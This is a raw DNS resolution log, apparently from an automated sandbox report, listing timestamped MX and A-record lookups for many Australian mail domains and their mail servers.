                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.466135025 CET8.8.8.8192.168.2.30xe876No error (0)mta6.am0.yahoodns.net67.195.204.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.466135025 CET8.8.8.8192.168.2.30xe876No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.466135025 CET8.8.8.8192.168.2.30xe876No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.466135025 CET8.8.8.8192.168.2.30xe876No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.466135025 CET8.8.8.8192.168.2.30xe876No error (0)mta6.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.466135025 CET8.8.8.8192.168.2.30xe876No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.466135025 CET8.8.8.8192.168.2.30xe876No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.477425098 CET8.8.8.8192.168.2.30x8068No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.477425098 CET8.8.8.8192.168.2.30x8068No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.477425098 CET8.8.8.8192.168.2.30x8068No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.584920883 CET8.8.8.8192.168.2.30x411cNo error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.584920883 CET8.8.8.8192.168.2.30x411cNo error (0)mta7.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.584920883 CET8.8.8.8192.168.2.30x411cNo error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.584920883 CET8.8.8.8192.168.2.30x411cNo error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.584920883 CET8.8.8.8192.168.2.30x411cNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.584920883 CET8.8.8.8192.168.2.30x411cNo error (0)mta7.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.584920883 CET8.8.8.8192.168.2.30x411cNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.584920883 CET8.8.8.8192.168.2.30x411cNo error (0)mta7.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.696163893 CET8.8.8.8192.168.2.30x71efNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.696163893 CET8.8.8.8192.168.2.30x71efNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.696163893 CET8.8.8.8192.168.2.30x71efNo error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.701988935 CET8.8.8.8192.168.2.30x15bcNo error (0)tang.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.701988935 CET8.8.8.8192.168.2.30x15bcNo error (0)tang.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.725106001 CET8.8.8.8192.168.2.30x758aNo error (0)student.nd.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.736108065 CET8.8.8.8192.168.2.30xe341No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.736108065 CET8.8.8.8192.168.2.30xe341No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.736108065 CET8.8.8.8192.168.2.30xe341No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.736108065 CET8.8.8.8192.168.2.30xe341No error (0)mta6.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.736108065 CET8.8.8.8192.168.2.30xe341No error (0)mta6.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.736108065 CET8.8.8.8192.168.2.30xe341No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.736108065 CET8.8.8.8192.168.2.30xe341No error (0)mta6.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.736108065 CET8.8.8.8192.168.2.30xe341No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.761415005 CET8.8.8.8192.168.2.30x54d6No error (0)workskil.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.761415005 CET8.8.8.8192.168.2.30x54d6No error (0)workskil.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.791719913 CET8.8.8.8192.168.2.30xf75No error (0)tang.in.tmes-anz.trendmicro.com13.238.202.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.791719913 CET8.8.8.8192.168.2.30xf75No error (0)tang.in.tmes-anz.trendmicro.com13.238.202.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.791719913 CET8.8.8.8192.168.2.30xf75No error (0)tang.in.tmes-anz.trendmicro.com13.238.202.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.795142889 CET8.8.8.8192.168.2.30x413cNo error (0)au-smtp-inbound-2.mimecast.com124.47.150.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.795142889 CET8.8.8.8192.168.2.30x413cNo error (0)au-smtp-inbound-2.mimecast.com103.13.69.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.795142889 CET8.8.8.8192.168.2.30x413cNo error (0)au-smtp-inbound-2.mimecast.com124.47.150.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.795142889 CET8.8.8.8192.168.2.30x413cNo error (0)au-smtp-inbound-2.mimecast.com103.13.69.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.852405071 CET8.8.8.8192.168.2.30xab4dNo error (0)salmat.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.852405071 CET8.8.8.8192.168.2.30xab4dNo error (0)salmat.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.852405071 CET8.8.8.8192.168.2.30xab4dNo error (0)salmat.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.852405071 CET8.8.8.8192.168.2.30xab4dNo error (0)salmat.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.852405071 CET8.8.8.8192.168.2.30xab4dNo error (0)salmat.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.897043943 CET8.8.8.8192.168.2.30x7150No error (0)cis.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.897043943 CET8.8.8.8192.168.2.30x7150No error (0)cis.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.945839882 CET8.8.8.8192.168.2.30x69f2No error (0)aspmx.l.google.com142.250.153.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:20.964034081 CET8.8.8.8192.168.2.30x9d5bNo error (0)dodo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.050036907 CET8.8.8.8192.168.2.30x39ebNo error (0)rwwa.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.050036907 CET8.8.8.8192.168.2.30x39ebNo error (0)rwwa.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.073363066 CET8.8.8.8192.168.2.30xc08aNo error (0)rwwa-mx1.firstwave.com.au203.39.128.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.073363066 CET8.8.8.8192.168.2.30xc08aNo error (0)rwwa-mx1.firstwave.com.au203.39.128.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.073363066 CET8.8.8.8192.168.2.30xc08aNo error (0)rwwa-mx1.firstwave.com.au203.39.128.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.073363066 CET8.8.8.8192.168.2.30xc08aNo error (0)rwwa-mx1.firstwave.com.au203.39.128.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.073363066 CET8.8.8.8192.168.2.30xc08aNo error (0)rwwa-mx1.firstwave.com.au203.39.9.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.073363066 CET8.8.8.8192.168.2.30xc08aNo error (0)rwwa-mx1.firstwave.com.au203.39.128.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.073363066 CET8.8.8.8192.168.2.30xc08aNo error (0)rwwa-mx1.firstwave.com.au203.39.9.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.073363066 CET8.8.8.8192.168.2.30xc08aNo error (0)rwwa-mx1.firstwave.com.au203.39.1.226A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.073363066 CET8.8.8.8192.168.2.30xc08aNo error (0)rwwa-mx1.firstwave.com.au203.39.9.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.073363066 CET8.8.8.8192.168.2.30xc08aNo error (0)rwwa-mx1.firstwave.com.au203.39.9.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.236920118 CET8.8.8.8192.168.2.30x2574No error (0)tpg.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.259243011 CET8.8.8.8192.168.2.30x8408Name error (3)beaconhills.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.265000105 CET8.8.8.8192.168.2.30x5675No error (0)asav.tpg.com.au27.32.32.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.312659025 CET8.8.8.8192.168.2.30xe1dcNo error (0)spin.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.312659025 CET8.8.8.8192.168.2.30xe1dcNo error (0)spin.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.312659025 CET8.8.8.8192.168.2.30xe1dcNo error (0)spin.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.324875116 CET8.8.8.8192.168.2.30x9381No error (0)people.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.324875116 CET8.8.8.8192.168.2.30x9381No error (0)people.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.338628054 CET8.8.8.8192.168.2.30xd70bNo error (0)wopr.ci.com.au192.65.182.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.338661909 CET8.8.8.8192.168.2.30x7425No error (0)mx-ctdodo.gtm.oss-core.net203.134.71.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.338661909 CET8.8.8.8192.168.2.30x7425No error (0)mx-ctdodo.gtm.oss-core.net203.134.153.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.483270884 CET8.8.8.8192.168.2.30xfc4dNo error (0)mx3.spintel.net.au203.29.125.6A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.550384998 CET8.8.8.8192.168.2.30x3260No error (0)ipt-mailgate-01.m2core.com.au203.134.71.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.551094055 CET8.8.8.8192.168.2.30xada2No error (0)spin.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.551094055 CET8.8.8.8192.168.2.30xada2No error (0)spin.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.551094055 CET8.8.8.8192.168.2.30xada2No error (0)spin.net.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.658277988 CET8.8.8.8192.168.2.30x8fc1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.658277988 CET8.8.8.8192.168.2.30x8fc1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.658277988 CET8.8.8.8192.168.2.30x8fc1No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.715823889 CET8.8.8.8192.168.2.30xf122No error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.715823889 CET8.8.8.8192.168.2.30xf122No error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.715823889 CET8.8.8.8192.168.2.30xf122No error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.715823889 CET8.8.8.8192.168.2.30xf122No error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.715823889 CET8.8.8.8192.168.2.30xf122No error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.715823889 CET8.8.8.8192.168.2.30xf122No error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.715823889 CET8.8.8.8192.168.2.30xf122No error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.715823889 CET8.8.8.8192.168.2.30xf122No error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.782430887 CET8.8.8.8192.168.2.30xeb71No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.782430887 CET8.8.8.8192.168.2.30xeb71No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.782430887 CET8.8.8.8192.168.2.30xeb71No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.830532074 CET8.8.8.8192.168.2.30x7e21No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.830532074 CET8.8.8.8192.168.2.30x7e21No error (0)mta5.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.830532074 CET8.8.8.8192.168.2.30x7e21No error (0)mta5.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.830532074 CET8.8.8.8192.168.2.30x7e21No error (0)mta5.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.830532074 CET8.8.8.8192.168.2.30x7e21No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.830532074 CET8.8.8.8192.168.2.30x7e21No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.830532074 CET8.8.8.8192.168.2.30x7e21No error (0)mta5.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.830532074 CET8.8.8.8192.168.2.30x7e21No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.860591888 CET8.8.8.8192.168.2.30xc77No error (0)rainbowinn.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.860591888 CET8.8.8.8192.168.2.30xc77No error (0)rainbowinn.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.860591888 CET8.8.8.8192.168.2.30xc77No error (0)rainbowinn.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.861499071 CET8.8.8.8192.168.2.30x7a38No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.861499071 CET8.8.8.8192.168.2.30x7a38No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.861499071 CET8.8.8.8192.168.2.30x7a38No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.888770103 CET8.8.8.8192.168.2.30xbd6dNo error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.888770103 CET8.8.8.8192.168.2.30xbd6dNo error (0)mta7.am0.yahoodns.net67.195.204.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.888770103 CET8.8.8.8192.168.2.30xbd6dNo error (0)mta7.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.888770103 CET8.8.8.8192.168.2.30xbd6dNo error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.888770103 CET8.8.8.8192.168.2.30xbd6dNo error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.888770103 CET8.8.8.8192.168.2.30xbd6dNo error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.888770103 CET8.8.8.8192.168.2.30xbd6dNo error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.888770103 CET8.8.8.8192.168.2.30xbd6dNo error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.888811111 CET8.8.8.8192.168.2.30xe4eaNo error (0)mx1.nameserver.net.au112.140.176.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.888811111 CET8.8.8.8192.168.2.30xe4eaNo error (0)mx1.nameserver.net.au103.42.110.229A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:21.953023911 CET8.8.8.8192.168.2.30xaf47No error (0)mx1.spintel.net.au203.29.125.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.078119040 CET8.8.8.8192.168.2.30xa6e8No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.078119040 CET8.8.8.8192.168.2.30xa6e8No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.078119040 CET8.8.8.8192.168.2.30xa6e8No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.103329897 CET8.8.8.8192.168.2.30x1068No error (0)mta5.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.103329897 CET8.8.8.8192.168.2.30x1068No error (0)mta5.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.103329897 CET8.8.8.8192.168.2.30x1068No error (0)mta5.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.103329897 CET8.8.8.8192.168.2.30x1068No error (0)mta5.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.103329897 CET8.8.8.8192.168.2.30x1068No error (0)mta5.am0.yahoodns.net67.195.228.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.103329897 CET8.8.8.8192.168.2.30x1068No error (0)mta5.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.103329897 CET8.8.8.8192.168.2.30x1068No error (0)mta5.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.103329897 CET8.8.8.8192.168.2.30x1068No error (0)mta5.am0.yahoodns.net67.195.228.94A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.249753952 CET8.8.8.8192.168.2.30xe8d5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.249753952 CET8.8.8.8192.168.2.30xe8d5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.249753952 CET8.8.8.8192.168.2.30xe8d5No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.277715921 CET8.8.8.8192.168.2.30xa859No error (0)mta7.am0.yahoodns.net98.136.96.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.277715921 CET8.8.8.8192.168.2.30xa859No error (0)mta7.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.277715921 CET8.8.8.8192.168.2.30xa859No error (0)mta7.am0.yahoodns.net67.195.228.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.277715921 CET8.8.8.8192.168.2.30xa859No error (0)mta7.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.277715921 CET8.8.8.8192.168.2.30xa859No error (0)mta7.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.277715921 CET8.8.8.8192.168.2.30xa859No error (0)mta7.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.277715921 CET8.8.8.8192.168.2.30xa859No error (0)mta7.am0.yahoodns.net98.136.96.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.277715921 CET8.8.8.8192.168.2.30xa859No error (0)mta7.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.288526058 CET8.8.8.8192.168.2.30xa987No error (0)optusnet.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.431298018 CET8.8.8.8192.168.2.30xde05No error (0)cit.act.edu.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.520836115 CET8.8.8.8192.168.2.30x1f53Name error (3)stprsuns.melb.catholic.edu.aunonenoneMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.535444021 CET8.8.8.8192.168.2.30xca8No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.535444021 CET8.8.8.8192.168.2.30xca8No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.535444021 CET8.8.8.8192.168.2.30xca8No error (0)yahoo.com.auMX (Mail exchange)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.560713053 CET8.8.8.8192.168.2.30x252dNo error (0)mta6.am0.yahoodns.net67.195.204.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.560713053 CET8.8.8.8192.168.2.30x252dNo error (0)mta6.am0.yahoodns.net98.136.96.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.560713053 CET8.8.8.8192.168.2.30x252dNo error (0)mta6.am0.yahoodns.net98.136.96.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.560713053 CET8.8.8.8192.168.2.30x252dNo error (0)mta6.am0.yahoodns.net67.195.204.72A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.560713053 CET8.8.8.8192.168.2.30x252dNo error (0)mta6.am0.yahoodns.net67.195.228.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.560713053 CET8.8.8.8192.168.2.30x252dNo error (0)mta6.am0.yahoodns.net67.195.228.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.560713053 CET8.8.8.8192.168.2.30x252dNo error (0)mta6.am0.yahoodns.net98.136.96.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.560713053 CET8.8.8.8192.168.2.30x252dNo error (0)mta6.am0.yahoodns.net67.195.204.73A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.590059042 CET8.8.8.8192.168.2.30xbccdNo error (0)extmail.optusnet.com.au211.29.133.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.594564915 CET8.8.8.8192.168.2.30x20cNo error (0)cit-act-edu-au.mail.protection.outlook.com104.47.71.202A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.594564915 CET8.8.8.8192.168.2.30x20cNo error (0)cit-act-edu-au.mail.protection.outlook.com104.47.71.138A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Dec 12, 2022 18:54:22.613056898 CET8.8.8.8192.168.2.30x5dd9No error (0)banksgroup.com.auMX (Mail exchange)IN (0x0001)false
